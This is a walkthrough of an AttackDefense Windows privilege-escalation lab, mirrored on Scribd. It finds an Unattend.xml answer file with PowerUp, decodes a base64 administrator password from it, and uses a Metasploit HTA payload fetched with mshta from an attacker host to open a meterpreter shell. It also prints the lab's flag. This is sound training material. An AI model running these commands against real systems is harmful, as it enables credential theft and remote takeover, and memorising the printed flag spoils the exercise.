Scribd
Upload
4 views

Unattended Installation

This document outlines the steps for performing an unattended installation lab focused on Windows security and privilege escalation. It details the use of PowerSploit and PowerUp scripts to identify vulnerabilities, decode an administrator password from an Unattend.xml file, and gain administrative access via a meterpreter shell. The final step involves locating a flag on the target machine after successfully exploiting the system.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4 views

Unattended Installation

This document outlines the steps for performing an unattended installation lab focused on Windows security and privilege escalation. It details the use of PowerSploit and PowerUp scripts to identify vulnerabilities, decode an administrator password from an Unattend.xml file, and gain administrative access via a meterpreter shell. The final step involves locating a flag on the target machine after successfully exploiting the system.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Name Unattended Installation

URL https://attackdefense.com/challengedetails?cid=2106

Type Windows Security: Privilege Escalation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Switch to ​Attacker Machine​ for locating a privilege escalation vulnerability.

Step 2:​ Open powershell.exe terminal to check the current user.


We are running as a student user. The PowerSploit framework and Powerup.ps1 scripts are
provided.

PowerSploit

“PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration
testers during all phases of an assessment. PowerSploit is comprised of the following modules
and scripts:”

PowerUp.ps1

“​PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely
on misconfigurations.​”

Source: ​https://github.com/PowerShellMafia/PowerSploit

Step 3: ​We will run the powerup.ps1 Powershell script to find privilege escalation vulnerability.

Commands: ​Powershell.exe
cd .\Desktop\PowerSploit\Privesc\
ls
Step 4: ​Import PowerUp.ps1 script and Invoke-PrivescAudit function.

Commands: ​powershell -ep bypass (PowerShell execution policy bypass)


. .\PowerUp.ps1
Invoke-PrivescAudit
We can notice that there is an ​Unattend.xml​ file present on the system. Open the
Unattend.xml​ file.

Unattend.xml:

Unattend.xml is an answer file for installation. The files may contain encoded or plain-text
credentials and other sensitive information.

Step 5: ​Reading Unattend.xml file.

Command: ​cat C:\Windows\Panther\Unattend.xml


We have discovered an administrator encoded password. i.e “​QWRtaW5AMTIz​”

Step 6: ​Decoding administrator password using Powershell.

Commands:
$password=​'QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($pa
ssword))
echo $password

The administrator password is “​Admin@123​”

Step 7: ​We are running a command prompt as an administrator user using discover credentials.
Commands: ​runas.exe /user:administrator cmd
Admin@123
whoami

We are running cmd.exe as an administrator.

Switch to the Kali Machine

Step 8: ​Running the hta_server module to gain the meterpreter shell. Start msfconsole.

Commands:
msfconsole -q
use exploit/windows/misc/hta_server
exploit

“​This module hosts an HTML Application (HTA) that when opened will run a payload via
Powershell..​”
Copy the generated payload i.e “​http://10.10.0.2:8080/6Nz7aySfPN.hta​” and run it on cmd.exe
with mshta command to gain the meterpreter shell.

Note:​ You need to execute the below payload on the cmd.exe

Switch to Target Machine

Step 9: ​Gaining a meterpreter shell.

Commands:

Note: ​You need to use your own metasploit HTA server link

Payload: ​mshta.exe http://10.10.0.2:8080/6Nz7aySfPN.hta

We can expect a meterpreter shell.


Step 10: ​Find the flag.

Commands:
sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt

This reveals the flag to us.

Flag: ​097ab83639dce0ab3429cb0349493f60
References

1. Answer files (unattend.xml)


(​https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/update-windo
ws-settings-and-scripts-create-your-own-answer-file-sxs​)
2. Metasploit (​https://www.metasploit.com/​)
3. HTA Web Server (​https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server​)

You might also like